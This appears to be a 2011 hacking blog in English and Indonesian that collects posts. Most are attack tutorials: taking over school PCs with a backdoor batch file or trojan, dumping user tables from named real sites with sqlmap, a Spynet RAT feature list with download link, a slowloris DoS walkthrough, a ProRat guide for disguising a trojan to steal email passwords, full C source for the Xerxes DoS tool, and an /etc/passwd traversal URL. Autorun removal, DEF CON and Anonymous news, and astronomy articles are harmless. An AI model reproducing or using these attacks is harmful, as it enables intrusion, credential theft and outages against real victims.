Breaking News

Saturday, August 20, 2011

Delete Autorun.inf Virus without any Software!

There are Numerous softwares available that exclusively deal with Autorun.inf and other Autorun viruses, for example ‘USB Disk Security‘. But Inspite of installing such kind of software, Sometimes you might accidentally open your USB disk Drive (Pen-drive) without looking at the warning by your Antivirus Software and thus Affecting your System with Autorun.inf virus. Once Autorun.inf gets control on your System, it will repeatedly Block any USB Scanning Software preventing it from deleting. It also Restricts you from opening hard drives on a double click.
In such cases, the Traditional Method of deleting Suspicious Programs Using Command Prompt is quite Useful. So Lets start with the Steps:
# 1. Open command prompt. Go to start > Run, and type “cmd” . Press enter.
# 2. Type “cd\” and press enter to get to the root directory of your System.
# 3. Type “attrib -h -r -s autorun.inf” and press enter. This will look for autorun.inf in the selected Drive.
# 4. Type “del autorun.inf” and press enter. This will delete autorun.inf virus from the selected Drive.
How to Delete Autorun.inf Virus from pendrive without any Software
# 5. Repeat the above Steps for other drives. To navigate to other Drives, First type “cls” to clear your ‘command prompt’ then type “d:” . Repeat the Steps for all the Drives including your USB Disk Drive.
# 6. Restart your System.
Read more ...

How To Hack Your School Network


This tutorial is for those newbies out there, wanting to "hack" their school. I'm gonna start by saying, if your going to hack the school, theres a high probability your get caught, and don't do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will allow you to take control of the PC's at school. Lets start:

How to take control of the PC's at school:

Here are the steps;
  1. Preparing The Virus

  2. Setting Up The Virus

  3. Controlling The PC


Obviously, if you gonna take control over your school PC you need a virus. You have 2 methods:
  1. The virus I made which is harmless and you won't even notice it was executed.

  2. Dropping a Trojan on the school PC.

Method 1

What you need:
  • Pen Drive (You can buy one, or you just use yours)

  • Brain (You can't buy this)


Now, open notepad and copy/paste this code: the code

Save the file as something.bat (you can change something to whatever you want). In "Save as type:" choose "All Files".


I strongly recommend you not to change the rdport and tnport configuration. The rdport will open the remote desktop default port, and the tnport will open the telnet's client default port.

You can change the username, password and the rport (randomn port you choose to be opened)

At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.

Save it and remove your pen drive.

Take your pen drive to school and run the bat file. Don't forget the pc you runned it in cause you might need it.

When you get home go to your pc and try to telnet them or remote desktop the PC.

Method 2:

In this method we will use a Trojan to control the school PC.

Here is a tutorial about how to create a Trojan: ProRat Trojan

Now just create a server (there is an explanation in the tutorial above), bind it and put it into your pen drive. Make sure you leave your PC turned on.

Then go to your school and drop the trojan.

Other way to do this is to give your trojan to a friend and tell him to stay in school. When you arrive home, send him a SMS and tell him to drop the trojan. This way you could even see if it worked.

After this you can probably do whatever you want with the PC. 
Read more ...

6 ways to hack or deface websites


Note : This post is only for Educational Purpose only.


ways to hack websites, hacking websites

What are basic things you should know before website hacking?
First of all everything is optional as i will start from very scratch. But you need atleast basic knowledge of following things..
1. Basics of HTML, SQL, PHP.
2. Basic knowledge of Javascript.
3. Basic knowledge of servers that how servers work.
4. And most important expertize in removing traces otherwise u have to suffer consequences.
Now First two things you can learn from a very famous website for basics of Website design with basics of HTML,SQL,PHP and javascript.

And for the fourth point that you should be expert in removing traces. I will explain this in my future articles. So keep reading.. or simply subscribe my posts..

As we know traces are very important. Please don't ignore them otherwise you can be in big trouble for simply doing nothing. so please take care of this step.

METHODS OF HACKING WEBSITE:
1. SQL INJECTION
2. CROSS SITE SCRIPTING
3. REMOTE FILE INCLUSION
4. LOCAL FILE INCLUSION
5. DDOS ATTACK
6. EXPLOITING VULNERABILITY.

1. SQL INJECTION
First of all what is SQL injection? SQL injection is a type of security exploit or loophole in which a attacker "injects" SQL code through a web form or manipulate the URL's based on SQL parameters. It exploits web applications that use client supplied SQL queries.
The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.

2. CROSS SITE SCRIPTING
Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn’t intended to do. XSS attacks are very popular and some of the biggest websites have been affected by them including the FBI, CNN, Ebay, Apple, Microsft, and AOL.Some website features commonly vulnerable to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields

Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.

I will explain this in detail in later hacking classes. So keep reading..


3. REMOTE FILE INCLUSION
Remote file inclusion is the most often found vulnerability on the website.
Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local
exploits to escalate his privileges and take over the whole system.
RFI can lead to following serious things on website :


  • Code execution on the web server

  • Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS).

  • Denial of Service (DoS)

  • Data Theft/Manipulation



4. LOCAL FILE INCLUSION
 
Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory transversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFI’s.
Let’s say a hacker found a vulnerable site, www.target-site.com/index.php?p=about, by means of directory transversal he would try to browse to the /etc/passwd file:
www.target-site.com/index.php?p= ../../../../../../../etc/passwd


I will explain it in detail with practical websites example in latter sequential classes on Website Hacking.
5. DDOS ATTACK
Simply called distributed denial of service attack. A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. In DDOS attack we consumes the bandwidth and resources of any website and make it unavailable to its legitimate users.
6.EXPLOTING VULNERABILITY
Its not a new category it comprises of above five categories but i mentioned it separately because there are several exploits which cannot be covered in the above five categories. So i will explain them individually with examples. The basic idea behind this is that find the vulnerability in the website and exploit it to get the admin or moderator privileges so that you can manipulate the things easily.
Read more ...

Spynet 2.7 Download - Ghost Edition



New features include:
- Added optional connection limit.
- Increased connection stability. Spy-Net is now as stable as SS-Rat.
- Increased speed in filemanager list files and list drives.
- Autostart on most features nw
- Password retrieval has been improved.

Features and specs:
- server around 280 kb, depending on if icon is selected, rootkit, upx compressed, etc
- windows xp, vista and 7 compatible;
- DNS Updater (for now working with No-IP. developing dyndns updater atm)
- File Manger with a load full of options like FTP upload, set attributes to files, preview for images, etc etc etc;
- Windows List;
- Process List;
- Device List;
- Service List;
- Registry Editor;
- Installed Programs;
- Active Ports List;
- Remote Desktop;
- Webcam capture;
- Audio Capture;
- Password Recovery Tool (with direct download to client or FTP logs);
- Password Grabber;
- Socks 4/5 proxy;
- HTTP Proxy;
- Open Webpage;
- Download and Execute;
- Send local files and run hidden or normally;
- Remote Chat Client;
- DOS Prompt;
- Run cmd;
- Clipboard Grabber;
- Search for remote files and search on Password Recovery Tool;
- Access to download folder, remote desktop screen shots and web capture from menu.
- Encrypted traffic between Client and server;
- a few extra options (restart, lock buttons and stuff....) and all the options related to server (uninstall, rename, etc etc etc);
- add a new option for injection - wait for first browser to open. not the default but the first to start. seems useful in some cases.
- Rootkit in beta stage and being developed. It will hide process name and startup keys that have SPY_NET_RAT as name. Tested under XP and working, being developed and tested on other OS's;
- Connections Limit selector;
- Binder,
- Columns selector (u can choose which columns u wanna see details from in the client. ex: u can hide RAM info view or Ports info view or any other using right click on top of the columns);
- Ability to choose either server is installed or not in remote computer.

NOTICE:you cant update it spynet 2.6 to 2.7 its not compatible


Spynet 2.7 RAT Review:

Hack Tool Threat Level : High
File Detection : High
Backdoor Status : Clean



Download :


http://www.mediafire.com/?nw7k5t2iips0w8z
Read more ...

Chat With Command Prompt


You only need your friend ip & command prompt Thumbs

1. Open Notepad & Write This

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

2. Save this as "messanger.bat"

3. Open our bat file

4. Now type ur friend ip address & enter

5. Now type ur msg & enter

6. Here you go Lol

Enjoy the trick Lol
Read more ...

How to hack almost every site with sqlmap ( Backtrack )

Start

- - - - - - - - - -

First of all you must to find some vuln sites...

Our target is : http://www.zwcad.org/

vuln : http://www.zwcad.org/download_form.php?id=107

to se if it is vuln try to add ' on url, like this :

http://www.zwcad.org/download_form.php?id=107'

- - - - - - - - - - - - - - - - - - - - - - - - - -

now when we have some vuln sites we can open a sqlmap...

Start>Backtrack>Exploitation Tools>Web Exploitation Tools>sqlmap

This is on a BackTrack 5...

- - - - - - - - - - - - - - - - - - - - - - - - - - - -

Now we must type some commands..

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 --dbs

It looks like this :[Image: step1.jpg]

when we hit the ENTER the scan is started and when scan is over we will get database's, it looks like this : [Image: wewillgotesomething.jpg]

Then we must put another commands to start searching a tables..
that command is :

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB --tables


When you hit the enter the tables seraching is started and when it's over we get this info :
[Image: tablessearching.jpg]

Now we must type a third command for searching columns, but dirst we must to chose a one table to get columns. I chose a cms_users table..

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB -T cms_users --dump

And you will get this : [Image: end.jpg]

You can to this too : Step by step..
To type a command for coloumns :

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB -T cms_users -C herethecolumnname --dump

With this command we will get a info about one column..
Like this : [Image: columnss.jpg]

Ypu always can find your files fump in : /pentest/web/scanners/sqlmap/output/

Now when we get the all info, we only must to find a admin panel and to log in and FUCK THEM !!! Smile

If you like this tutorial give me +1 rep !

Sorry about my bad English, if i make some mistakes ! XD

Happy hacking !
Read more ...

DOS ATTACKS | DENIAL OF SERVICES [TUT]

DOS ATTACKS


DOS Attacks or Denial Of Services is a very favorite hacking technique by hackers. This is relatively easy to do and have been testing grounds for budding hackers. In fact, hackers use this technique to gain wide recognition because of the fame and respect that a successful DOS Attack brings to the hacker in the underground groups.

DOS attack is done by sending too much data packets which cannot be handled by the target network server. There are many avenues of exploits and these are vulnerabilities in the TCP/IP protocols suite, vulnerabilities in the Ipv4 implementation and the use of the resources of the target system and make the services unable to respond.

There are many vulnerabilities in TCP/IP itself and some of them are enumerated here as they are called Ping of Death, Teardrop, SYN attacks and Land Attacks.

Ping of Death

This was one of the earliest tool of denial of service during the time when systems where less complex than they are today. There are now fully upgraded systems that are invulnerable to Ping of Death attacks. Ping of Death works by causing the system to hang or reboot and thereby unusable by legitimate users.

In this attack, the target system is pinged with a data packet that exceeds the maximum bytes allowed by TCP/IP. When the target computer is pinged, the system has no recourse but to hang, reboot or crash.

Teardrop

The Teardrop is an attack that exploits the vulnerability in the reassembling of data packets.

When data is sent over the Internet, it is first broken down into smaller fragments at the source system and then put together at the destination system. With a teardrop attack, the hacker will confuse the target making it unable to put together the correct sequence of data packets.

When these packets are divided up they have an OFFSET field in their TCP header part which will determine which date packet that each fragment is carrying.
By disrupting the series of data packets by overlapping their Offset field values, the target system becomes unable to piece them together and forced to crash, hang or reboot.

SYN Attack

The SYN attack is a disruption in the TCP/IP's three-way connection by using bad IP address to so that the SYN ACK will never come and the target server waits and waits. When a connection is negotiated by a computer to the Internet, there is a three way connection that must be established.

When too many of these disruptions are sent, the target will no longer have the resources to entertain legitimate connection request.

In a SYN attack, the attacker send SYN packets server with a SYN packets from a bad source IP Address. When the target system receives these SYN Packets with Bad IP Addresses, it tries to respond to each one of them with a SYN ACK packet. Now the target system waits for an ACK message to come from the bad IP address.


Land Attacks

This is no longer famous since this can be easily addressed. A Land attack is like the SYN attack but this time the attacker uses the target’s own IP address to create an infinite loop where the target waits for itself to send acknowledgement which will never come because it is the target system itself waiting to communicate with itself.


Smurf Attacks

A Smurf attack is a DOS Attack done by making huge number of Ping Requests with spoofed IP Addresses from within the target network creating a traffic that is too much for target system to handle. The result then is that the target network is unable to respond to legitimate users.


Distributed DOS Attacks

This is a new and improved DOS attack which is far greater threat that even threatens the virus as the most feared DOS Attack in the Internet.
This Distributed DOS attack will allow attackers to escape because it will be difficult to trace them because they are a group that acts in concert with each other. This kind of attack is somehow a little difficult since each will have to find lesser weakness on the target network and work their way up together. I know i dont have any images but that doens't realy matter
Read more ...

Down Any Website Using QSlowloris


[Image: ib8B1Fa2G.png]

What is DoS attack?

Short for denial-of-service attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols. For all known DoS attacks, there are software fixes that system administrators can install to limit the damage caused by the attacks. But, like viruses, new DoS attacks are constantly being dreamed up by hackers.

Credits http://www.webopedia.com/TERM/D/DoS_attack.html

Let's Go Find Vulnerable Website

[Image: ieJx2pZMX.png]

Most websites using Apache servers,so find any website and go to http://uptime.netcraft.com/ now you need check website

Ready to DoS Attack

First you need Download QSlowloris

Windows Version - http://www.megaupload.com/?d=3DV6R4ZL
Linux Version - http://www.megaupload.com/?d=08RJVYTE

Virus Scan - http://www.virustotal.com/file-scan/repo...1309466345

Open Program and Start Attack

Open QSlowloris

[Image: imQQM4sx.png]

Now set up Options

[Image: igI8L7QF.png]

And Click " Fire "

Go to http://www.downforeveryoneorjustme.com/ and check website Offline or Online State

[Image: iWtShELL.png]

Website Offline

TuT Is Over. If U Have Any Questions Ask & Add +Rep If U Like Rofl
Read more ...

How to Hack E-Mail Account Password - Email Hacking Software

Now you know that there are many ways to hack email password, like bruteforcing, social engineering or Reverting, but the main two methods used to hack email passwords are Remote Keylogging and Phishing. In this article i'll show you how to hack email account password using keyloggers and trojans. Here I am demonstrating using PRORAT trojan. You can use any trojan or keylogger as per your ease. The basic functionality of all backdoors are same. Pls make note that all these hacking tools and softwares are detected by antivirus. You have to uninstall or close you running antivirus first. Now we can start.

How to Hack Email Account Passwords Using ProRat?

1. First of all Download ProRat. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be "pro".

2. Open up the program. You should see the following:
[Image: prorat.bmp]

3. Next we will create the ProRat Trojan server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".
[Image: prorat2.png]

4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.
[Image: prorat3.bmp]

5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

Here is a quick overview of what they mean and which should be checked:
[Image: prorat4.bmp]

6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. A good suggestion is a picture or an ordinary text document because that is a small file and its easier to send to the people you need.
[Image: prorat5.bmp]

7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files, because it is cryptable and has icon support, but exe’s looks suspicious so it would be smart to change it.
[Image: prorat7.bmp]

8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.
[Image: prorat8.bmp]
9. After this, press Create server, your server will be in the same folder as ProRat. A new file with name "binded_server" will be created. Rename this file to something describing the picture. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.

Very important: Do not open the "binded_server" file on your system.

10. You can send this trojan server via email, pendrive or if you have physical access to the system, go and run the file. You can not send this file via email as "server.exe", because it will be detected as trojan or virus. Password protect this file with ZIP and then email it. Once your victim download this ZIP file, ask him to unlock it using ZIP password. When the victim will double click on the file, he will be in your control.

11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.

Once the victim runs the server on his computer, the trojan will be installed onto his computer in the background. The hacker would then get a message telling him that the victim was infected. He would then connect to his computer by typing in his IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to the victims computer and have full control over it.
[Image: prorat9.bmp]

12. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all victim's computer files, he can shut down his pc, get all the saved passwords off his computer, send a message to his computer, format his whole hard drive, take a screen shot of his computer, and so much more. Below I’ll show you a few examples.
[Image: prorat10.bmp]

13. The image below shows the message that the victim would get on his screen if the hacker chose to message him.
[Image: prorat11.bmp]

14. Below is an image of the victims task bar after the hacker clicks on Hide Start Button.
[Image: prorat12.bmp]

15. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.
[Image: prorat13.bmp]

As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.
Read more ...

Distributed Denial-of-Service attack (DDoS)


DDoS For beginners

This was written more of as a personal note. But still If you are confused as I was about DDoS maybe It'll help you.. 

Distributed denial-of-service (DDoS) attack is one in which a multitude of compromised systems attack a single target, thereby causing denial of service for users of the targeted system. The flood of incoming messages to the target system essentially forces it to shut down, thereby denying service to the system to legitimate users.

In a typical DDoS attack, a hacker (or, if you prefer, cracker) begins by exploiting a vulnerability in one computer system and making it the DDoS master. It is from the master system that the intruder identifies and communicates with other systems that can be compromised. The intruder loads cracking tools available on the Internet on multiple -- sometimes thousands of -- compromised systems. With a single command, the intruder instructs the controlled machines to launch one of many flood attacks against a specified target. The inundation of packets to the target causes a denial of service.


While the press tends to focus on the target of DDoS attacks as the victim, in reality there are many victims in a DDoS attack -- the final target and as well the systems controlled by the intruder. Although the owners of co-opted computers are typically unaware that their computers have been compromised, they are nevertheless likely to suffer degradation of service and malfunction. Both owners and users of targeted sites are affected by a denial of service. Yahoo, Buy.com, RIAA and the United States Copyright Office are among the victims of DDoS attacks. DDoS attacks can also create more widespread disruption. In October 2010, for example, a massive DDoS attack took the entire country of Myanmar offline.

A computer under the control of an intruder is known as a zombie or bot. A group of co-opted computers is known as a botnet or a zombie army. Both Kaspersky Labs and Symantec have identified botnets -- not spam, viruses, or worms -- as the biggest threat to Internet security.
Read more ...

Threaded Mode | Linear Mode DDOS Tools: Xerxes DOS Tools

Berikut ini adalah source code Xerxes DOS (DDOS Tools) yang digunakan untuk melakukan DOS terhadap server-server. Digunakan oleh The Jester untuk takedown situs-situs, langsung aja ini source codenya:

/* XerXes – Most powerful dos tool – THN (http://pastebin.com/aWZMbjSU) */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;
// fprintf(stderr, “[Connecting -> %s:%s\n", host, port);
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror®);
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n”, host, port);
return sock;
}

void broke(int s) {
// do nothing
}

#define CONNECTIONS 8
#define THREADS 48

void attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], “\0″, 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
} else
// fprintf(stderr, “Socket[%i->%i] -> %i\n”, x, sockets[x], r);
fprintf(stderr, “[%i: Voly Sent]\n”, id);
}
fprintf(stderr, “[%i: Voly Sent]\n”, id);
usleep(300000);
}
}

void cycle_identity() {
int r;
int socket = make_socket(“localhost”, “9050″);
write(socket, “AUTHENTICATE \”\”\n”, 16);
while(1) {
r=write(socket, “signal NEWNYM\n\x00″, 16);
fprintf(stderr, “[%i: cycle_identity -> signal NEWNYM\n", r);
usleep(300000);
}
}

int main(int argc, char **argv) {
int x;
if(argc !=3)
cycle_identity();
for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}
Read more ...

Thursday, August 11, 2011

Konvensi Hacker AS, Ajang Saling Bobol Data




VIVAnews - Sebuah konvensi para peretas (hacker) digelar di hotel Rio, Las Vegas, Amerika Serikat, 6 Agustus 2011. Konvensi yang menghadirkan para peretas dari tingkat pemula hingga mahir ini menjadikan hotel Rio wilayah paling rawan pembobolan sistem komputer.

Menurut stasiun berita CNN, konvensi yang dinamakan DEF CON ini telah diikuti oleh 15.000 orang sejak pertama kali digelar secara sembunyi-sembunyi 19 tahun lalu. Di konvensi ini, para hacker dapat berbagi trik dan jurus jitu pembobolan jaringan. Mereka juga dapat berbagi kunci peretasan serta password situs yang hendak mereka bobol.

Tujuan konvensi ini adalah untuk memberikan pemahaman pada para anggota dan masyarakat luas mengenai resiko bobolnya data di dunia digital sekarang ini. Selain itu, para anggota konvensi juga mencari solusi memperbaiki sistem keamanan internet yang telah ada menjadi lebih baik.

Itu pernyataan normatif dari panitia, tapi yang terjadi justru kebalikannya.

Para hacker yang dikumpulkan di kasino hotel Rio malah asik saling serang demi mempraktekkan ilmu "hitam" mereka. Hal ini tidak ayal menjadikan jaringan Wi-Fi maupun LAN di hotel Rio menjadi yang paling berbahaya sedunia.

"Kau berada di jaringan paling rentan di seluruh dunia. Jika kau bisa selamat disini, berarti kau bisa selamat di mana saja," ujar Brian Markus, veteran hacker, merujuk kepada jaringan di DEF CON.

Bukannya berbagi, para hacker malah justru menutup rapat-rapat identitas mereka, mengamankannya dari terobosan hacker lain. Sementara itu hacker lainnya, dengan bangga menunjukkan kemahirannya merebut password dan identitas pribadi koleganya di dalam ruangan tersebut. Password yang telah diretas ini terpampang jelas di layar besar di tengah ruangan bertuliskan "dinding para domba". Tidak ayal, hal ini menelanjangi para hacker amatir.

Sederet Pantangan

Untuk meliput acara ini, wartawan CNN diberikan sederet larangan demi keamanan data-data dan kartu kreditnya. Di antaranya himbauan untuk tidak menggunakan ATM di lokasi sekitar konvensi, mematikan bluetooth, Wi-Fi di semua perangkat, termasuk handphone. Tidak menerima hadiah dari orang tidak dikenal, terutama menerima USB.

Wartawan juga diminta untuk mengganti semua password mereka setibanya di Las Vegas. Selain itu, kunci kartu kamar hotel dan kartu kredit diminta agar disimpan di tempat berlapis, seperti di dompet atau tas. Hal ini untuk menghindari alat pemindai kecil yang terselip di telapak para hacker. Selain itu, wartawan atau orang awan diminta tidak menggunakan handphone mereka--telepon maupun sms--demi mencegah pembobolan jaringan.

"Kau mengirimkan sms bertuliskan 'Aku sayang kamu', hacker dapat mengubahnya menjadi 'aku minta putus' atau lebih buruk dari itu. Dalam berbisnis, kau mengetik sms 'jual semuanya', hacket dapat mengubahnya jadi 'beli semuanya'," ujar Austin Steed, ahli keamanan internet.

Read more ...

Hacker Umumkan Rencana 'Bunuh' Facebook



Hacker Anonymous   
VIVAnews - Kelompok hacker Anonymous mengumumkan rencana mereka untuk 'membunuh' sosial media Facebook. Hal ini akan mereka lakukan karena Facebook dianggap telah menyalahgunakan identitas pribadi para penggunanya.

"Media komunikasi yang sangat kalian sayangi dan puja ini akan segera dihancurkan," ujar seorang yang mengaku anggota Anonymous di Youtube, dikutip dari CNN, Selasa, 9 Agustus 2011.

Tokoh yang wajah serta suaranya disamarkan ini mengaku wakil dari Anonymous. Dia mengajak para pengguna Facebook turut serta dalam upaya menghancurkan sosial media tersebut, demi keselamatan identitas pribadi mereka.

"Apapun yang kau masukkan di Facebook, tetap ada di Facebook. Menghapus akunmu juga tidak mungkin dilakukan. Jikapun kau dapat menghapusnya, semua informasi dirimu masih ada di Facebook dan dapat dimunculkan kapan saja," kata dia.

Dalam video tersebut, wakil Anonymous juga mengatakan bahwa Facebook telah menjual informasi identitas penggunanya kepada para agen pemerintah untuk dimata-matai. Rencananya, operasi ini akan dilakukan pada 5 November mendatang, bertepatan dengan hari Guy Fawkes. Hari itu, pada tahun 1605 terjadi upaya pembunuhan raja Inggris oleh Fawkes.

Juru Bicara Facebook menolak mengomentari rencana Anonymous tersebut. Namun, Facebook sebelumnya telah berulangkali mengatakan tidak menyebarkan identitas penggunanya ke pihak ketiga tanpa adanya persetujuan dari pengguna. "Kami tidak memberikan informasi pribadi pengguna kepada orang-orang atau badan lain. Kami tidak akan dan tidak akan pernah melakukan hal itu," kata pendiri Facebook, Mark Zuckerberg, tahun lalu.

Namun, tidak semua anggota Anonymous menyetujui penyerangan terhadap Facebook ini. Perlu diketahui, Anonymous adalah organisasi peretas yang tidak jelas struktur kepemimpinan dan pengurusnya. Organisasi ini juga tidak memiliki ikatan dan aturan yang jelas dan memungkinkan para anggotanya melakukan tindakan secara independen.

"FYI - #opFacebook hanya dilakukan oleh sebagian Anons. Hal ini menunjukkan tidak semua #Anonymous menyetujuinya," tulis kelompok ini dalam akun Twitternya, @GroupAnon.

Sumber
Read more ...

Sunday, August 7, 2011

Planet Tertua di semesta berusia 12,7 Milliar tahun







Ternyata sejak tahun 1995 para ilmuwan telah melakukan penelitian terhadap alam semesta. Hasilnya, mereka menemukan sekira 450 planet baru yang terletak di luar tata surya.


Dari peneltian tersebut, para ilmuwan menemukan bahwa ada planet yang sudah sangat tua, bahkan sampai ada yang mirip sekali dengan bumi. Ilmuwan menyebutkan primeval world, atau planet tertua yang usianya sekitar 12,7 miliar tahun.


Dilansir Space.com, Selasa (29/6/2010), para ilmuwan tersebut memperkirakan planet tersebut terbentuk sebelum bumi, dan hanya berbeda 2 miliar tahun dari kejadian Big Bang. Oleh ilmuwan, hal ini bisa diasumsikan bahwa kehidupan mungkin sudah terjadi lebih awal.


Sementara itu, ilmuwan tersebut meneliti planet 51 Pegasi B, yang mirip planet Jupiter. Sama seperti Jupiter, Bellerphon memiliki suhu permukaan yang sangat panas dan terletak pada gugus bintang Pegasus. Nama Bellerphon sendiri, menurut mitos Yunani, berarti pahlawan yang menjinakkan kuda bersayap Pegasus.


Sementara planet yang mirip dengan Bumi dikenal dengan nama Gliese 581 C. Akan tetapi, walaupun mempunyai kesamaan dengan bumi, ukuran planet tersebut separuh lebih besar dan lima kali lebih padat ketimbang bumi.


Hingga saat ini, para peneliti masih mendalami apakah ada kehidupan di planet yang sama dengan Bumi tersebut.
Read more ...

Awal dan sejarah di temukannya asteorid

Bermula dari kecurigaan para astronom pada abad XVIII mengenai perbedaan jarak yang terlampau jauh yang memisahkan orbit planet Mars dengan Jupiter, pada ujungnya menimbulkan spekulasi bahwa di antara orbit kedua planet tersebut pastilah ada sebuah planet yang belum dikenal. Upaya pencarian objek misterius tersebut akhirnya membuahkan hasil ketika pada tanggal 1 januari 1801, seorang astronom berkebangsaan Italia, Giuseppe Piazzi (1746-1826) dari Observatorium Palermo berhasil menemukan objek yang semula disebut-sebut sebagai “planet kelima” itu. “Planet” baru tersebut kemudian diberi nama Ceres, mengambil nama seorang Dewi bangsa Sisilia kuno.


Tidak lama setelah penemuan ini, pada bulan Maret 1802, Johann Olbers, seorang astronom berkebangsaan Jerman menemukan sebuah “planet kecil” lainnya yang diberi nama Pallas. Kemudian berturut-turut ditemukan Juno oleh C.L. Harding (1804) serta Vesta oleh Johann Olbers (1807).


Sejak itu, komunitas astronomi mulai menggunakan istilah asteroid atau planet minor untuk menyebut sekumpulan benda angkasa berukuran kecil dengan bentuk tidak beraturan yang mengorbit matahari. Selanjutnya disepakati bahwa penamaan untuk asteroid menggunakan nama yang diberikan oleh si-penemu dengan diawali oleh nomor urut penemuannya, misalnya 1 Ceres, 433 Eros, 2340 Hathor, dan seterusnya.


Sejauh ini, yang tercatat sebagai asteroid dengan ukuran terbesar adalah Ceres dengan diameter sekitar 1000 km. Sekitar 16 asteroid diketahui memiliki diameter diatas 240 km, sedangkan sisanya memiliki diameter kurang dari itu. Asteroid umumnya tersusun atas batuan dan logam. Hanya sedikit yang kita ketahui mengenai proses terbentuknya asteroid. Salah satu teori menyebutkan bahwa asteroid adalah merupakan sisa-sisa dari sebuah planet yang hancur akibat ledakan atau tabrakan dengan objek lain. Namun demikian, pengamatan lebih jauh menunjukkan bahwa asteroid kemungkinan besar tidak pernah menjadi bagian dari sebuah planet, karena pada kenyataannya apabila seluruh asteroid yang ada disatukan sebagai sebuah objek tunggal, maka objek hasil penggabungan tersebut akan memiliki diameter yang sangat kecil, tepatnya tidak sampai mencapai 1.400 km, atau kurang dari setengah ukuran Bulan kita.


